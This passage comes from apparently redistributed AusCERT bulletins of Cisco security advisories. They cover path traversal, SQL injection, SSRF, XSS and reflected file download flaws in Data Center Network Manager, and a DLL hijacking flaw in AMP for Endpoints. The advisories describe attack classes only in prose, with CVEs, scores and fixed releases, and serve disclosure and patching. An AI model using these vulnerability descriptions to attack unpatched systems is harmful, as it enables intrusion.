advisory for the most complete and current information. Exploitation and Public Announcements o The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory. Source o This vulnerability was found during internal security testing. Cisco Security Vulnerability Policy o To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy . This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco. URL o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-info-disc-QCSJB6YG Revision History o +----------+---------------------------+----------+--------+--------------+ | Version | Description | Section | Status | Date | +----------+---------------------------+----------+--------+--------------+ | 1.0 | Initial public release. | - | Final | 2021-JAN-20 | +----------+---------------------------+----------+--------+--------------+ - -------------------------------------------------------------------------------- Cisco Data Center Network Manager REST API Vulnerabilities Priority: Medium Advisory ID: cisco-sa-dcnm-api-path-TpTApx2p First Published: 2021 January 20 16:00 GMT Version 1.0: Final Workarounds: No workarounds available Cisco Bug IDs: CSCvt82606 CSCvu28383 CSCvu28385 CVE Names: CVE-2021-1133 CVE-2021-1135 CVE-2021-1255 CWEs: CWE-184 CWE-20 CWE-807 CVSS Score: 6.5 AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:X/RL:X/RC:X Summary o Multiple vulnerabilities in the REST API endpoint of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker to view, modify, and delete data without proper authorization. For more information about these vulnerabilities, see the Details section of this advisory. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-api-path-TpTApx2p Affected Products o Vulnerable Products At the time of publication, these vulnerabilities affected Cisco DCNM releases earlier than Release 11.4(1). See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Products Confirmed Not Vulnerable Only products listed in the Vulnerable Products section of this advisory are known to be affected by this vulnerability. Details o The vulnerabilities are not dependent on one another. Exploitation of one of the vulnerabilities is not required to exploit the other vulnerabilities. In addition, a software release that is affected by one of the vulnerabilities may not be affected by the other vulnerabilities. Details about the vulnerabilities are as follows. CVE-2021-1133: Cisco Data Center Network Manager Path Traversal Vulnerability A vulnerability in the REST API of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker with a low-privilege account to conduct a path traversal attack on an affected device. The vulnerability is due to insufficient validation of user-supplied input to the API. An attacker could exploit this vulnerability by sending a crafted request to the API. A successful exploit could allow the attacker to delete arbitrary files on the file system. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Bug ID(s): CSCvt82606 CVE-ID: CVE-2021-1133 Security Impact Rating (SIR): Medium CVSS Base Score: 6.5 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2021-1255: Cisco Data Center Network Manager Path Traversal Vulnerability A vulnerability in a certain REST API endpoint of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker to perform a path traversal attack on an affected device. The vulnerability is due to insufficient path restriction enforcement. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to overwrite or list arbitrary files on the affected device. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Bug ID(s): CSCvu28383 CVE-ID: CVE-2021-1255 Security Impact Rating (SIR): Medium CVSS Base Score: 4.6 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N CVE-2021-1135: Cisco DCNM Software Configuration Bypass Vulnerability A vulnerability in a certain REST API endpoint of Cisco Data Center Network Manager could allow an authenticated, remote attacker to bypass security controls and modify default server configuration settings on the affected device. The vulnerability is due to an incorrect comparison in a denylist implementation. An attacker could exploit this vulnerability by sending specially crafted network traffic to the affected software. A successful exploit could allow the attacker to modify server configuration settings on the affected device. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Bug ID(s): CSCvu28385 CVE-ID: CVE-2021-1135 Security Impact Rating (SIR): Medium CVSS Base Score: 4.3 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N Workarounds o There are no workarounds that address these vulnerabilities. Fixed Software o When considering software upgrades , customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page , to determine exposure and a complete upgrade solution. In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers. Fixed Releases At the time of publication, Cisco DCNM releases 11.4(1) and later contained the fix for these vulnerabilities. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Exploitation and Public Announcements o The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory. Source o These vulnerabilities were found during internal security testing. Cisco Security Vulnerability Policy o To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy . This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco. URL o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-api-path-TpTApx2p Revision History o +----------+---------------------------+----------+--------+--------------+ | Version | Description | Section | Status | Date | +----------+---------------------------+----------+--------+--------------+ | 1.0 | Initial public release. | - | Final | 2021-JAN-20 | +----------+---------------------------+----------+--------+--------------+ - -------------------------------------------------------------------------------- Cisco Data Center Network Manager SQL Injection Vulnerabilities Priority: High Advisory ID: cisco-sa-dcnm-sql-inj-OAQOObP First Published: 2021 January 20 16:00 GMT Version 1.0: Final Workarounds: No workarounds available Cisco Bug IDs: CSCvv82432 CSCvv82433 CVE Names: CVE-2021-1247 CVE-2021-1248 CWEs: CWE-89 Summary o Multiple vulnerabilities in certain REST API endpoints of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker to execute arbitrary SQL commands on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-sql-inj-OAQOObP Affected Products o Vulnerable Products These vulnerabilities affect Cisco DCNM releases earlier than Release 11.5 (1). Products Confirmed Not Vulnerable Only products listed in the Vulnerable Products section of this advisory are known to be affected by these vulnerabilities. Details o The vulnerabilities are not dependent on one another. Exploitation of one of the vulnerabilities is not required to exploit the other vulnerability. In addition, a software release that is affected by one of the vulnerabilities may not be affected by the other vulnerability. Details about the vulnerabilities are as follows. CVE-2021-1247: Cisco DCNM SQL Injection Vulnerability A vulnerability in a REST API endpoint of Cisco DCNM could allow an authenticated, remote attacker with lower-level privileges to execute arbitrary SQL commands on an affected device. This vulnerability is due to insufficient validation of user-supplied input to the API. An attacker with lower-level privileges, such as network-operator , could exploit this vulnerability by sending a crafted request to the API. A successful exploit could allow the attacker to view information that they are not authorized to view, make changes to the system that they are not authorized to make, or execute commands within the underlying operating system that may affect the availability of the device. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Bug ID(s): CSCvv82432 CVE ID: CVE-2021-1247 Security Impact Rating (SIR): High CVSS Base Score: 8.8 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2021-1248: Cisco DCNM SQL Injection Vulnerability A vulnerability in a REST API endpoint of Cisco DCNM could allow an authenticated, remote attacker with administrative privileges to execute arbitrary SQL commands on an affected device. This vulnerability is due to insufficient validation of user-supplied input to the API. An attacker with administrative privileges could exploit this vulnerability by sending a crafted request to the API. A successful exploit could allow the attacker to view information that they are not authorized to view, make changes to the system that they are not authorized to make, or execute commands within the underlying operating system that may affect the availability of the device. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Bug ID(s): CSCvv82433 CVE ID: CVE-2021-1248 Security Impact Rating (SIR): High CVSS Base Score: 7.2 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H Workarounds o There are no workarounds that address these vulnerabilities. Fixed Software o Cisco has released free software updates that address the vulnerabilities described in this advisory. Customers may only install and expect support for software versions and feature sets for which they have purchased a license. By installing, downloading, accessing, or otherwise using such software upgrades, customers agree to follow the terms of the Cisco software license: https://www.cisco.com/c/en/us/products/end-user-license-agreement.html Additionally, customers may only download software for which they have a valid license, procured from Cisco directly, or through a Cisco authorized reseller or partner. In most cases this will be a maintenance upgrade to software that was previously purchased. Free security software updates do not entitle customers to a new software license, additional software feature sets, or major revision upgrades. When considering software upgrades , customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page , to determine exposure and a complete upgrade solution. In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers. Customers Without Service Contracts Customers who purchase directly from Cisco but do not hold a Cisco service contract and customers who make purchases through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should obtain upgrades by contacting the Cisco TAC: https://www.cisco.com/c /en/us/support/web/tsd-cisco-worldwide-contacts.html Customers should have the product serial number available and be prepared to provide the URL of this advisory as evidence of entitlement to a free upgrade. Fixed Releases Cisco fixed these vulnerabilities in Cisco DCNM releases 11.5(1) and later. Exploitation and Public Announcements o The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory. Source o These vulnerabilities were found during internal security testing. Cisco Security Vulnerability Policy o To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy . This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco. URL o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-sql-inj-OAQOObP Revision History o +----------+---------------------------+----------+--------+--------------+ | Version | Description | Section | Status | Date | +----------+---------------------------+----------+--------+--------------+ | 1.0 | Initial public release. | - | Final | 2021-JAN-20 | +----------+---------------------------+----------+--------+--------------+ - -------------------------------------------------------------------------------- Cisco Data Center Network Manager Server-Side Request Forgery Vulnerability Priority: High Advisory ID: cisco-sa-dcnm-ssrf-F2vX6q5p First Published: 2021 January 20 16:00 GMT Version 1.0: Final Workarounds: No workarounds available Cisco Bug IDs: CSCvv82444 CVE Names: CVE-2021-1272 CWEs: CWE-918 Summary o A vulnerability in the session validation feature of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass access controls and conduct a server-side request forgery (SSRF) attack on a targeted system. This vulnerability is due to insufficient validation of parameters in a specific HTTP request by an attacker. An attacker could exploit this vulnerability by sending a crafted HTTP request to an authenticated user of the DCNM web application. A successful exploit could allow the attacker to bypass access controls and gain unauthorized access to the Device Manager application, which provides access to network devices managed by the system. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-ssrf-F2vX6q5p Affected Products o Vulnerable Products This vulnerability affects Cisco DCNM Software if it is running a release earlier than 11.5(1). This vulnerability affects DCNM-Storage Area Network (SAN) deployments , including the following: Open Virtual Appliance (OVA) deployments Windows DCNM-SAN installations Linux DCNM-SAN installations Products Confirmed Not Vulnerable Only products listed in the Vulnerable Products section of this advisory are known to be affected by this vulnerability. Workarounds o There are no workarounds that address this vulnerability. Fixed Software o Cisco has released free software updates that address the vulnerability described in this advisory. Customers may only install and expect support for software versions and feature sets for which they have purchased a license. By installing, downloading, accessing, or otherwise using such software upgrades, customers agree to follow the terms of the Cisco software license: https://www.cisco.com/c/en/us/products/end-user-license-agreement.html Additionally, customers may only download software for which they have a valid license, procured from Cisco directly, or through a Cisco authorized reseller or partner. In most cases this will be a maintenance upgrade to software that was previously purchased. Free security software updates do not entitle customers to a new software license, additional software feature sets, or major revision upgrades. When considering software upgrades , customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page , to determine exposure and a complete upgrade solution. In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers. Customers Without Service Contracts Customers who purchase directly from Cisco but do not hold a Cisco service contract and customers who make purchases through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should obtain upgrades by contacting the Cisco TAC: https://www.cisco.com/c /en/us/support/web/tsd-cisco-worldwide-contacts.html Customers should have the product serial number available and be prepared to provide the URL of this advisory as evidence of entitlement to a free upgrade. Fixed Releases Cisco fixed this vulnerability in Cisco DCNM software releases 11.5(1) and later. Exploitation and Public Announcements o The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory. Source o This vulnerability was found during internal security testing. Cisco Security Vulnerability Policy o To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy . This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco. URL o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-ssrf-F2vX6q5p Revision History o +----------+---------------------------+----------+--------+--------------+ | Version | Description | Section | Status | Date | +----------+---------------------------+----------+--------+--------------+ | 1.0 | Initial public release. | - | Final | 2021-JAN-20 | +----------+---------------------------+----------+--------+--------------+ - -------------------------------------------------------------------------------- Cisco Data Center Network Manager Vulnerabilities Priority: Medium Advisory ID: cisco-sa-dcnm-xss-vulns-GuUJ39gh First Published: 2021 January 20 16:00 GMT Version 1.0: Final Workarounds: No workarounds available Cisco Bug IDs: CSCvu50101 CSCvu68933 CSCvv00638 CSCvv00642 CSCvv00643 CSCvv00644 CSCvv00645 CSCvv00646 CSCvv00654 CSCvv07930 CSCvv87589 CSCvv87602 CSCvv87608 CSCvv87614 CVE Names: CVE-2021-1249 CVE-2021-1250 CVE-2021-1253 CVE-2021-1286 CWEs: CWE-20 CWE-79 Summary o Multiple vulnerabilities in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow a remote attacker with network-operator privileges to conduct a cross-site scripting (XSS) attack or a reflected file download (RFD) attack against a user of the interface. For more information about these vulnerabilities, see the Details section of this advisory. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-xss-vulns-GuUJ39gh Affected Products o Vulnerable Products At the time of publication, these vulnerabilities affected Cisco DCNM releases earlier than Release 11.5(1). See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Products Confirmed Not Vulnerable Only products listed in the Vulnerable Products section of this advisory are known to be affected by these vulnerabilities. Details o The vulnerabilities are not dependent on one another. Exploitation of one of the vulnerabilities is not required to exploit the other vulnerability. In addition, a software release that is affected by one of the vulnerabilities may not be affected by the other vulnerability. Details about the vulnerabilities are as follows. CVE-2021-1249: Cisco DCNM Cross-Site Scripting Vulnerabilities Multiple vulnerabilities in the web-based management interface of Cisco DCNM could allow an authenticated, remote attacker to conduct an XSS attack against a user of the interface. These vulnerabilities are due to insufficient input validation by the web-based management interface. An attacker could exploit these vulnerabilities by inserting malicious data into a specific data field in the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. Bug ID(s): CSCvv00645 , CSCvu50101 , CSCvu49711 , CSCvu68933 CVE ID: CVE-2021-1249 Security Impact Rating (SIR): Medium CVSS Base Score: 6.5 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L CVE-2021-1286: Cisco DCNM Reflected File Download Vulnerabilities Multiple vulnerabilities in the web-based management interface of Cisco DCNM could allow an unauthenticated, remote attacker to conduct an RFD attack against a user of the interface of an affected device. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by persuading an authenticated user of the interface to click a link that submits malicious input to the interface. A successful exploit could allow the attacker to execute arbitrary script code on the affected device. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. Bug ID(s): CSCvv87608 , CSCvv87589 , CSCvv87602 CVE ID: CVE-2021-1286 Security Impact Rating (SIR): Medium CVSS Base Score: 6.1 CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N CVE-2021-1250: Cisco DCNM Cross-Site Scripting Vulnerabilities Multiple vulnerabilities in the web-based management interface of Cisco DCNM could allow an authenticated, remote attacker to conduct an XSS attack against a user of the interface. These vulnerabilities are due to insufficient input validation by the web-based management interface. An attacker could exploit these vulnerabilities by inserting malicious data into a specific data field in the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. Bug ID(s): CSCvv00642 , CSCvv87614 , CSCvv00638 , CSCvv00644 , CSCvv00654 , CSCvv00643 CVE ID: CVE-2021-1250 Security Impact Rating (SIR): Medium CVSS Base Score: 5.9 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L CVE-2021-1253: Cisco DCNM Persistent Cross-Site Scripting Vulnerabilities Multiple vulnerabilities in the web-based management interface of Cisco DCNM could allow an authenticated, remote attacker to conduct an XSS attack against a user of the interface. These vulnerabilities are due to insufficient input validation by the web-based management interface. An attacker could exploit these vulnerabilities by inserting malicious data into a specific data field in the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. Bug ID(s): CSCvv07930 , CSCvv00646 CVE ID: CVE-2021-1253 Security Impact Rating (SIR): Medium CVSS Base Score: 5.9 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L Workarounds o There are no workarounds that address these vulnerabilities. Fixed Software o When considering software upgrades , customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page , to determine exposure and a complete upgrade solution. In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers. Fixed Releases At the time of publication, Cisco Data Center Network Manager releases 11.5 (1) and later contained the fix for these vulnerabilities. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Exploitation and Public Announcements o The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory. Source o These vulnerabilities were found during internal security testing. Cisco Security Vulnerability Policy o To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy . This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco. URL o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-xss-vulns-GuUJ39gh Revision History o +----------+---------------------------+----------+--------+--------------+ | Version | Description | Section | Status | Date | +----------+---------------------------+----------+--------+--------------+ | 1.0 | Initial public release. | - | Final | 2021-JAN-20 | +----------+---------------------------+----------+--------+--------------+ - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBYAkX2uNLKJtyKPYoAQhBPw//Sf6Ygf/j2PMfs3S+wzBCEt2z47IGbgsK t5zkciYRd56y+0y+SGs3oniZTFbd19gLN4WqzYcavLcJFGzBHvPnq78G+tLnts5J OlM4DCilgcyaVPPA3mz6doKL8ttNeVnXWVVkMSxQnJIKCuPci6Sys/fJoGBbX0NJ ROeeqQa4CZRgeH8ecyy3tvpPapRbXC+Xuye058KQOl0Ei06zxuO9LwAVB2kYLsbw 3O2x61xOInuwcMNasPq/EkyFKvL2zQnWfUWG1qTCGLOWqtlh6bM6zvAsDIpYm6Sw QJ+/u7Y7Qtk5mtGihIWxNEsW9KUIqHcR91Fu3n0nizTobtw25yeCeW2otdAEZcyH bg79/wmUpnYnKX5pmJlD5i2TE8GTevVTh2dfCyd8eJH5fHDDp5kFFA0Ski+kBEoB VuTowQdeeWu58cyEdInZJ/gDoVt6wEnsOCVpE/Gjc3QupOIV/55cHU0RQyUY1g8Z uowsqwAanE8C1E9b8sH81v7pj2Wrz23PrypasCHBbDND9Jatqa26GstMsyZ7fthf qz5eNgz9qvPeRQxVDEyFjl4yTAQQ8ALYjv8WIAEvD7oyi3x/Yt+cae/fjUeigfS9 1m0vmH2v7kantc29yctj9VCHFDquAvkmSznnB31W4lujIDty2/lydPmYb/AXUOJc dXhNryjzQ54= =QwFo -----END PGP SIGNATURE-----
AusCERT - Security Bulletins · 2021. január 21.

ESB-2021.0245 - [Win] Cisco Advanced Malware Protection for Endpoints and Immunet for Windows: Execute arbitrary code/commands - Existing account

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2021.0245 Cisco Advanced Malware Protection for Endpoints and Immunet for Windows DLL Hijacking Vulnerability 21 January 2021 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Cisco Advanced Malware Protection for Endpoints and Immunet for Windows Publisher: Cisco Systems Operating System: Windows Impact/Access: Execute Arbitrary Code/Commands -- Existing Account Resolution: Patch/Upgrade CVE Names: CVE-2021-1280 Original Bulletin: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-amp-imm-dll-5PAZ3hRV - --------------------------BEGIN INCLUDED TEXT-------------------- Cisco Advanced Malware Protection for Endpoints and Immunet for Windows DLL Hijacking Vulnerability Priority: High Advisory ID: cisco-sa-amp-imm-dll-5PAZ3hRV First Published: 2021 January 20 16:00 GMT Version 1.0: Final Workarounds: No workarounds available Cisco Bug IDs: CSCvv53346 CVE Names: CVE-2021-1280 CWEs: CWE-427 Summary o A vulnerability in the loading mechanism of specific DLLs of Cisco Advanced Malware Protection (AMP) for Endpoints for Windows and Immunet for Windows could allow an authenticated, local attacker to perform a DLL hijacking attack. To exploit this vulnerability, the attacker would need valid credentials on the Windows system. This vulnerability is due to incorrect handling of directory search paths at run time. An attacker could exploit this vulnerability by placing a malicious DLL file on the targeted system. This file will execute when the vulnerable application launches. A successful exploit could allow the attacker to execute arbitrary code on the targeted system with SYSTEM privileges. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-amp-imm-dll-5PAZ3hRV Affected Products o Vulnerable Products This vulnerability affects the following products: All Cisco AMP for Endpoints for Windows releases earlier than Release 7.3.3 All Immunet for Windows releases earlier than Release 7.3.12 Products Confirmed Not Vulnerable Only products listed in the Vulnerable Products section of this advisory are known to be affected by this vulnerability. Cisco has confirmed that this vulnerability does not affect the following Cisco products: AMP for Endpoints for Linux AMP for Endpoints for Mac Workarounds o There are no workarounds that address this vulnerability. Fixed Software o Cisco has released free software updates that address the vulnerability described in this advisory. Customers may only install and expect support for software versions and feature sets for which they have purchased a license. By installing, downloading, accessing, or otherwise using such software upgrades, customers agree to follow the terms of the Cisco software license: https://www.cisco.com/c/en/us/products/end-user-license-agreement.html Additionally, customers may only download software for which they have a valid license, procured from Cisco directly, or through a Cisco authorized reseller or partner. In most cases this will be a maintenance upgrade to software that was previously purchased. Free security software updates do not entitle customers to a new software license, additional software feature sets, or major revision upgrades. When considering software upgrades , customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page , to determine exposure and a complete upgrade solution. In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers. Customers Without Service Contracts Customers who purchase directly from Cisco but do not hold a Cisco service contract and customers who make purchases through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should obtain upgrades by contacting the Cisco TAC: https://www.cisco.com/c /en/us/support/web/tsd-cisco-worldwide-contacts.html Customers should have the product serial number available and be prepared to provide the URL of this advisory as evidence of entitlement to a free upgrade. Fixed Releases Cisco fixed this vulnerability in the following releases: Cisco AMP for Endpoints for Windows releases 7.3.3 and later Immunet for Windows releases 7.3.12 and later Exploitation and Public Announcements o The Cisco Product Security Incident Response Team (PSIRT) is not aware of any malicious use of the vulnerability that is described in this advisory. Source o Cisco would like to thank Hou JingYi of Qihoo 360 CERT for initially reporting this vulnerability. Cisco would also like to thank Kyriakos Economou and Tom Wilson of ZeroPeril Ltd. for their report on this vulnerability. Cisco Security Vulnerability Policy o To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy . This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco. URL o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-amp-imm-dll-5PAZ3hRV Revision History o +----------+---------------------------+----------+--------+--------------+ | Version | Description | Section | Status | Date | +----------+---------------------------+----------+--------+--------------+ | 1.0 | Initial public release. | - | Final | 2021-JAN-20 | +----------+---------------------------+----------+--------+--------------+ - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBYAkWpONLKJtyKPYoAQj2BRAAm2FCLHUFvWdEsJe7Mif7TEcVME6EBnBG rFu/eSssvFHtxI37+ND5s1GXLIJsDiB5kELXITJhbIGV4oJNs4Is67MmKJSOIubZ XIF70TbcmlJJxMTbop8Wg3Z87GiQiPcz/w027/tR1tA/QDVQz1nL/WcjGXRbLmau 5ATXDfS4fpJF5LI/db9upNcqMp/yhVrEel3aWCm4oCSt5AoDECuHSxJ7b1Loq749 6IbYkWJHB0Ry8s5ZiPfzq++aNrW3EsLxru5nxzdQCpN8/8T9CC8noOMK+nq0H7t8 4MOGrqD6honule1KrE26mofrLb9zjz9dugTqcVZz4Wm+66bigHYdOqsb3sBb8s4P o9oOhONcgJr0Qy7Oa2kFQPuXR9zJCadXGEQu4Azerr/zUiDRTwBrtRoOF7/gHUoI ZvbeD8Rbi867EUYAbmLy2zfj9ZwxOdOYmR10zIH4Dlgxor5K7enCiovSjFnHR0Ez 18v6Ayc1mzAYSsYCCQs/HAtYm4m98XeUfATArRaK2utWHQaXI7P94InCipNHZop6 6LS/ajAW0AEE7F76fK4uEFX2Yj/yeeHHZZLXBNJe7855kwOtD7bwGZ3rrGwfR/l7 rx5wnoOv3N6NKnhDhgqQBdhejV5JhYHxEIDP/SkYf3lt9I5dWReC1pH4s59C6MRO S/o/N5AFs58= =tCkb -----END PGP SIGNATURE-----
AusCERT - Security Bulletins · 2021. január 21.

ESB-2021.0244 - [Cisco] Cisco SD-WAN vManage Software: Multiple vulnerabilities

